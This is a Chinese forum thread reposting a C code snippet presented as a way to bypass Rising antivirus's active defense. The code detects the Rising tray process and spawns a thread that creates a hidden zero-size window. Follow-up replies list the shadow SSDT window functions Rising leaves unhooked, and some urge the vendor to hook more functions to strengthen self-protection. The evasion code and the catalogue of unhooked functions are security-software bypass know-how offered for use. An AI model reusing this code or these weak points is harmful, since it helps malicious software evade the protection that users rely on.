1   1  /  1  页   跳转

[转载] 过瑞星主动防御的方法 ------窗体过瑞星

过瑞星主动防御的方法 ------窗体过瑞星

#include <Tlhelp32.h>
/*----------------------------------窗体过瑞星------------------------------------*/
BOOL ProcessExit(LPCTSTR szProcName)
{
PROCESSENTRY32 pe;
DWORD dwRet;
BOOL bFound = FALSE;

HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSP)
{
  pe.dwSize = sizeof( pe );
 
  for (dwRet = Process32First(hSP, &pe);
  dwRet;
  dwRet = Process32Next(hSP, &pe))
  {
    if (lstrcmpi( szProcName, pe.szExeFile) == 0)
    {
    bFound = TRUE;
    break;
    }
  }
  CloseHandle(hSP);
 
}
return bFound;
}
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
return DefWindowProc(hWnd, message, wParam, lParam);
}
DWORD WINAPI Fun_CreateWindow( LPVOID pData )
{
HWND hWnd = NULL;
HINSTANCE SelfHin = GetModuleHandle(NULL);
MSG msg;
WNDCLASSEX wcex;
PCHAR szWindowClass = "Oath";
memset( &wcex, 0, sizeof(WNDCLASSEX) );
wcex.cbSize    = sizeof(WNDCLASSEX);
wcex.style    = CS_HREDRAW | CS_VREDRAW;
wcex.lpfnWndProc = (WNDPROC)WndProc;
wcex.hInstance  = SelfHin;
wcex.hIcon    = LoadIcon( NULL, IDI_WINLOGO );
wcex.hCursor  = LoadCursor( NULL, IDC_ARROW );
wcex.hbrBackground = (HBRUSH)COLOR_WINDOW;
wcex.lpszClassName = szWindowClass;
RegisterClassEx(&wcex);
hWnd = CreateWindow( szWindowClass, "", WS_OVERLAPPEDWINDOW, 0, 0, 0, 0, NULL, NULL, SelfHin, NULL);
if (hWnd)
{
  ShowWindow(hWnd, SW_SHOW );
  UpdateWindow(hWnd);
  while (GetMessage(&msg, NULL, 0, 0))
  {
    TranslateMessage(&msg);
    DispatchMessage(&msg);
  }
}
return 0;
}
/*----------------------------------窗体过瑞星------------------------------------*/
      if (ProcessExit("Rstray.exe"))
{
        CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Fun_CreateWindow, NULL, 0, NULL);
        Sleep(50);
}






http://hi.baidu.com/ksattack/blog/item/afe66dede28c4b242cf53432.html




用户系统信息:Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/3.0.195.0 Safari/531.0 SE 2.X
分享到:
gototop
 

回复:过瑞星主动防御的方法 ------窗体过瑞星

发现瑞星在 shadown hook 上 挂钩太少!!!

此代码 利用了这个 特点  过瑞星的 主防!!!

瑞星的 在 shadown 上 窗体 太弱
gototop
 

瑞星shadown hook 太过薄弱!!!

很多 shadown hook 函数  瑞星没挂!!!





瑞星全功能 加上 账号保险柜的  挂钩 总共 有以下 函数 没有 挂钩::::




NtUserGetForegroundWindow      得到当前顶层窗口


NtUserBuildHwndList                    枚举所有顶层窗口


NtUserQueryWindow                  获取句柄对应的进程PID


NtUserSetParent                  改变某个子窗口的父窗


NtUserSetWindowLong                    改变窗口属性


NtUserShowWindow                      改变窗口显示状态


NtUserDestroyWindow                          销毁窗口


NtUserCallHwndParamLock            禁用、启用窗口





忽略 保险柜的 钩子  瑞星总共  挂了  3个  shadown


请完善 shadown 的 挂钩!!!






用户系统信息:Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0
gototop
 

请增强 软件自保!!!

请挂钩以下函数:::

建议ravmond 进程 挂接  进程钩子  ------kernel32!LoadLibraryExW


建议瑞星驱动  inline  hook 以下  函数  增强自保!!
              nt!ObReferenceObjectByHandle 


              nt!PsLookupProcessByProcessId    进程相关


              nt!PsLookupThreadByThreadId        线程相关


              RtlPrefetchMemoryNonTemporal 


              NtDuplicateObject 


                    KiFastCallEntry


                NtTerminateProcess--------inline  ssdt 中  NtTerminateProcess函数,这样 驱动调用此函数时 ,也就避免了 不经过ssdt的弊端!!!


                NtTerminateThread---------同上

挂接  ssdt中的ntmapviewofsection ----------目标文件的内容映射到目标进程的用户空间





挂接shadown hook 中以下函数::::


shadown:::NtUserBuildHwndList  NtUserDestroyWindow  NtUserFindWindowEx  NtUserGetForegroundWindow


                        NtUserMessageCall    NtUserPostMessage    NtUserPostThreadMessage  NtUserQueryWindow 


                        NtUserSetParent      NtUserSetWindowLong  NtUserSetWindowsHookEx  NtUserShowWindow


                        NtUserWindowFromPoint







瑞星全功能驱动 只挂接了 3个  请挂接 其它 的  函数  ----增强自保!!!




具体作用:::








用户系统信息:Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0
gototop
 

回复:过瑞星主动防御的方法 ------窗体过瑞星

一楼的 代码和  下面 的 “shadow SSDT hook挂钩  是 没 合并的主题

建议瑞星增强自保
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT